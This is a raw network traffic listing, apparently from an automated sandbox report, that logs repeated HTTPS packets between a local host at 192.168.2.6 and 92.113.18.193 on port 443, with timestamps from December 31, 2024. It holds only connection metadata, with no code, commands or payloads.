                                          Dec 31, 2024 10:38:08.755484104 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.756899118 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.756917000 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.756978035 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.756997108 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.757041931 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.845316887 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.845339060 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.845398903 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.845418930 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.845514059 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.846777916 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.846793890 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.846828938 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.846837044 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.846884966 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.847764969 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.847780943 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.847826004 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.847834110 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.847870111 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.847892046 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.849462986 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.849478006 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.849559069 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.849565983 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.849627972 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.935771942 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.935794115 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.935836077 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.935844898 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.935882092 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.935910940 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.937143087 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.937161922 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.937200069 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.937207937 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.937243938 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.937252998 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.937814951 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.937829971 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.937880039 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.937886953 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.937956095 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.938570023 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.938585043 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.938648939 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.938657999 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.938791037 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.939553022 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.939568996 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.939642906 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.939651012 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.939749956 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.941243887 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.941260099 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.941308975 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.941318989 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.941720963 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.024306059 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.024328947 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.024375916 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.024389029 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.024415016 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.024441957 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.026742935 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.026757002 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.026793957 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.026803017 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.026829004 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.026850939 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.027396917 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.027410984 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.027456999 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.027465105 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.027491093 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.027699947 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.028983116 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029001951 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029045105 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.029051065 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029061079 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029191017 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.029263020 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029284000 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029310942 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.029319048 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029335976 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.029360056 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.029709101 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029722929 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.029773951 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.029782057 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.030097961 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.030119896 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.030137062 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.030143976 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.030181885 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.030215979 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.030553102 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.030566931 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.030617952 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.030626059 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.030702114 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.114804029 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.114829063 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.114877939 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.114888906 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.114927053 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.114954948 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.117611885 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.117634058 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.117686033 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.117692947 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.117728949 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.117760897 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.117897987 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.117913008 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.117948055 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.117954969 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.117976904 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118051052 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118225098 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118240118 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118288040 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118294001 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118308067 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118341923 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118346930 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118815899 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118839979 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118868113 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118875027 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118901014 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118915081 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118938923 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118978024 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.118987083 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.118993044 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.119029999 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.119060993 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.119076014 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.119112968 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.119119883 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.119126081 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.119242907 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.119242907 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.119256020 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.119292974 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.119302034 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.119360924 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.205280066 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.205307961 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.205363035 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.205387115 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.205415010 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.205435038 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.207881927 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.207896948 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.207948923 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.207957983 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.207999945 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.208020926 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.209697008 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.209712029 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.209750891 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.209758043 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.209796906 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.209810972 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.211325884 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.211340904 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.211379051 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.211386919 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.211416006 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.211437941 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212136984 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212163925 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212198019 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212204933 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212228060 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212253094 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212392092 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212414026 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212445974 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212452888 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212482929 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212501049 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212671995 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212687016 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212722063 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212727070 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.212747097 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212778091 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.212986946 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.213001966 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.213046074 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.213052988 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.213076115 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.213102102 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.295948982 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.295970917 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.296021938 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.296040058 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.296072960 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.296098948 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.298377991 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.298393965 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.298470020 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.298477888 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.298523903 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.300126076 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.300141096 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.300230980 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.300239086 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.300338030 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.302627087 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.302642107 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.302692890 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.302701950 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.302710056 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.302742004 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.304061890 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.304086924 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.304146051 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.304153919 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.304214954 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.304233074 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.304246902 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.304291010 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.304296970 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.304322958 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.304342985 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.304481030 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.304497004 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.304534912 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.304543018 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.304564953 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.304596901 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.304636002 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.304651976 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.304696083 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.304702997 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.304727077 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.304761887 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.388770103 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.388797045 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.388851881 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.388860941 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.388886929 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.388900995 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.388910055 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.388911963 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.388922930 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.388948917 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.388979912 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.391352892 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.391372919 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.391421080 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.391429901 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.391448975 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.391547918 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.393083096 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.393098116 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.393137932 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.393145084 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.393167019 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.394551039 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.394571066 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.394608021 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.394619942 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.394624949 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.394668102 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.394722939 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.394737959 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.394783020 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.394790888 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.395020008 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.395044088 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.395078897 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.395087004 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.395107985 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.395132065 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.395180941 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.395196915 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.395234108 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.395240068 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.395257950 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.395282030 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.399092913 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.479361057 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.479381084 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.479450941 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.479470968 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.479528904 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.479737997 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.479753971 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.479793072 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.479799032 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.479820967 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.479840994 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.481770039 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.481782913 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.481832981 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.481839895 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.481883049 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.481906891 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.483560085 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.483576059 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.483617067 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.483623981 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.483666897 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.483688116 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.484982967 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.485001087 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.485050917 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.485057116 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.485099077 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.485109091 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.485138893 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.485156059 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.485191107 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.485197067 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.485219955 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.485296965 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.485482931 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.485498905 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.485543966 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.485551119 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.485569000 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.485584974 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.485682964 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.485692978 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.485759020 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.485771894 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.485821962 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.569830894 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.569850922 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.569936991 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.569956064 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.570228100 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.570230007 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.570247889 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.570271015 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.570290089 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.570322990 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.570328951 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.570534945 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.572257996 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.572264910 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.572339058 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:09.572345972 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:09.572412968 CET49743443192.168.2.692.113.18.193
